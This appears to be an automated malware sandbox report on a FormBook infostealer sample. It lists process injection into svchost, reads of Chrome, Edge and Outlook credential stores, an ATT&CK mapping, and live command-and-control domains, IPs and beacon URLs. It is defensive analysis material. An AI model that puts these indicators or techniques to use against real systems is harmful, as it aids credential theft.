                Source: BLv4mI7zzY.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: BLv4mI7zzY.exe, XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045862B cpuid 0_2_0045862B
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00464E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00464E87
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00471E06 GetUserNameW,0_2_00471E06
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00463F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00463F3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004349A0

                Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_81
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_XP
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_XPe
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_VISTA
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_7
Source: BLv4mI7zzY.exe | Binary or memory string: WIN_8
Source: BLv4mI7zzY.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004A6283 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket, 0_2_004A6283
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004A6747 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, 0_2_004A6747
MITRE ATT&CK Matrix (per tactic; the number in parentheses is the count of matching signatures, techniques without a number had no matches):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (312), Startup Items, Scheduled Task/Job, At
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (312)
Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1588799 | Sample: BLv4mI7zzY.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100

Start
  Domains/IPs: www.l54354.xyz; www.shopphere.store; 5 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
  www.l54354.xyz: Performs DNS queries to domains with low reputation
  -> BLv4mI7zzY.exe (2) started

BLv4mI7zzY.exe
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe started

svchost.exe
  Signatures: Maps a DLL or memory area into another process
  -> XNNdkVYUhBbatb.exe injected

XNNdkVYUhBbatb.exe
  Network: www.shopphere.store 209.74.79.40, ports 53771, 53772, 53774, MULTIBAND-NEWHOPEUS, United States; www.l54354.xyz 162.218.30.235, ports 53765, 80, ANT-CLOUDUS, United States; dns.ladipage.com 13.228.81.39, ports 53767, 53768, 53769, AMAZON-02US, United States
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  -> RMActivate_ssp_isv.exe (13) started

RMActivate_ssp_isv.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
  -> firefox.exe started

Source | Detection | Scanner | Label
BLv4mI7zzY.exe | 57% | Virustotal |
BLv4mI7zzY.exe | 63% | ReversingLabs | Win32.Worm.DorkBot
BLv4mI7zzY.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.sharefree88k24.click/iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 | 0% | Avira URL Cloud | safe
http://www.l54354.xyz/jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 | 0% | Avira URL Cloud | safe
https://la.ladipage.com/ | 0% | Avira URL Cloud | safe
http://www.shopphere.store | 0% | Avira URL Cloud | safe
https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/ | 0% | Avira URL Cloud | safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/ | 0% | Avira URL Cloud | safe
http://www.shopphere.store/bq63/ | 0% | Avira URL Cloud | safe
http://www.sharefree88k24.click/iz19/ | 0% | Avira URL Cloud | safe
https://fburl.com | 0% | Avira URL Cloud | safe
https://api.forms.ladipage.com/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dns.ladipage.com | 13.228.81.39 | true | false | | high
www.l54354.xyz | 162.218.30.235 | true | true | | unknown
www.shopphere.store | 209.74.79.40 | true | true | | unknown
www.odvfr.info | 47.254.140.255 | true | true | | unknown
www.valdevez.net | unknown | unknown | false | | unknown
www.sharefree88k24.click | unknown | unknown | false | | unknown
www.tizzles.tech | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.sharefree88k24.click/iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 | true | Avira URL Cloud: safe | unknown
http://www.l54354.xyz/jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 | true | Avira URL Cloud: safe | unknown
http://www.sharefree88k24.click/iz19/ | true | Avira URL Cloud: safe | unknown
http://www.shopphere.store/bq63/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://optimize.google.com | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://la.ladipage.com/ | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w.ladicdn.com/ | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/ | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.googleanalytics.com | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.googleoptimize.com | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.shopphere.store | XNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.forms.ladipage.com/ | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693 | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://td.doubleclick.net | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/ | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fburl.com | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693 | XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.79.40 | www.shopphere.store | United States | 31744 | MULTIBAND-NEWHOPEUS | true
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
162.218.30.235 | www.l54354.xyz | United States | 62587 | ANT-CLOUDUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588799
Start date and time: 2025-01-11 05:37:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BLv4mI7zzY.exe (renamed because original name is a hash value)
Original Sample Name: 54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@6/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 48
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:40:10 | API Interceptor | 450387x Sleep call for process: RMActivate_ssp_isv.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
209.74.79.40 | SLq0ulC3Wf.exe | malicious | FormBook | www.futurexz.xyz/bhaz/
209.74.79.40 | gH3LlhcRzg.exe | malicious | FormBook | www.unlimitu.website/bhgd/
209.74.79.40 | rQuotation.exe | malicious | FormBook | www.yous.website/sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0
209.74.79.40 | PO 1202495088.exe | malicious | FormBook | www.unlimitu.website/b4eq/
209.74.79.40 | CJE003889.exe | malicious | FormBook | www.balanpoint.life/0cbv/
13.228.81.39 | SpCuEoekPa.exe | malicious | FormBook | www.muasamgiare.click/dc08/
13.228.81.39 | 5CTbduoXq4.exe | malicious | FormBook | www.taxiquynhonnew.click/y49d/
13.228.81.39 | EIvidclKOb.exe | malicious | FormBook | www.muasamgiare.click/dc08/
13.228.81.39 | KcSzB2IpP5.exe | malicious | FormBook | www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P
13.228.81.39 | Payment Receipt.exe | malicious | FormBook | www.sonixingenuine.shop/01c7/
13.228.81.39 | ORDER - 401.exe | malicious | FormBook | www.muasamgiare.click/bsye/
13.228.81.39 | CJE003889.exe | malicious | FormBook | www.erexolsk.shop/jh0k/
13.228.81.39 | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | www.taxiquynhonnew.click/y49d/
13.228.81.39 | QUOTATON-37839993.exe | malicious | FormBook | www.muasamgiare.click/dc08/
13.228.81.39 | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | www.taxiquynhonnew.click/y49d/
162.218.30.235 | k9OEsV37GE.exe | malicious | FormBook | www.l03678.xyz/798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF
162.218.30.235 | XeFYBYYj0w.exe | malicious | FormBook | www.l03678.xyz/798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz
162.218.30.235 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.l40175.xyz/9wie/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dns.ladipage.com | BalphRTkPS.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | SpCuEoekPa.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | 5CTbduoXq4.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | 0Wu31IhwGO.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | NFhRxwbegd.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | EIvidclKOb.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | bkTW1FbgHN.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | KcSzB2IpP5.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | Payment Receipt.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | ORDER - 401.exe | malicious | FormBook | 13.228.81.39
www.odvfr.info | NWPZbNcRxL.exe | malicious | FormBook | 47.254.140.255
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | 4.elf | malicious | Unknown | 18.131.143.241
AMAZON-02US | ydJaT4b5N8.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | BalphRTkPS.exe | malicious | FormBook | 18.139.62.226
AMAZON-02US | n2pGr8w21V.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | PGK60fNNCZ.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 76.223.54.146
AMAZON-02US | zAg7xx1vKI.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | 1SxKeB4u0c.exe | malicious | FormBook | 18.141.10.107
AMAZON-02US | SpCuEoekPa.exe | malicious | FormBook | 13.228.81.39
AMAZON-02US | suBpo1g13Q.exe | malicious | FormBook | 13.248.169.48
ANT-CLOUDUS | k9OEsV37GE.exe | malicious | FormBook | 162.218.30.235
ANT-CLOUDUS | XeFYBYYj0w.exe | malicious | FormBook | 162.218.30.235
ANT-CLOUDUS | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 162.218.30.235
ANT-CLOUDUS | http://www.bit-chasers.com/ | malicious | Unknown | 154.83.27.206
ANT-CLOUDUS | http://manilaministop.com | malicious | Unknown | 154.83.24.123
ANT-CLOUDUS | http://njanow.com/ | malicious | Unknown | 154.83.25.141
ANT-CLOUDUS | http://www.iyogiblog.com | malicious | Unknown | 154.83.24.118
ANT-CLOUDUS | NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs | malicious | FormBook, GuLoader | 154.83.27.102
MULTIBAND-NEWHOPEUS | SLq0ulC3Wf.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | ZcshRk2lgh.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | ydJaT4b5N8.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | BalphRTkPS.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 209.74.77.109
MULTIBAND-NEWHOPEUS | suBpo1g13Q.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | k9OEsV37GE.exe | malicious | FormBook | 209.74.79.41
MULTIBAND-NEWHOPEUS | XeFYBYYj0w.exe | malicious | FormBook | 209.74.79.41
MULTIBAND-NEWHOPEUS | BcF3o0Egke.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | hgq5nzWJll.exe | malicious | FormBook | 209.74.79.42
No context
No context
Process: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe
File Type: Unknown
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
